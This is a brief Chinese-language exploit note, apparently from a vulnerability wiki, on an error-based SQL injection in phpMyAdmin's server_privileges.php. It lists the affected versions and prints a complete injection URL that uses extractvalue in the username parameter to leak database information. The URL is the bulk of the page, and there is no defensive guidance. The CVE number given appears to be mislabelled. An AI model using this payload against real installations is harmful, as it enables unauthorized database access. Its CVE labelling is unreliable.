跳转至

phpMyAdmin SQL注入(CVE-2020-0554)

漏洞影响

phpMyAdmin 4 < 4.9.4 phpMyAdmin 5 < 5.0.1 已知一个用户名密码

漏洞利用

注入点为username,报错注入,语句格式如下http://**********/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server


最后更新: 2021-03-24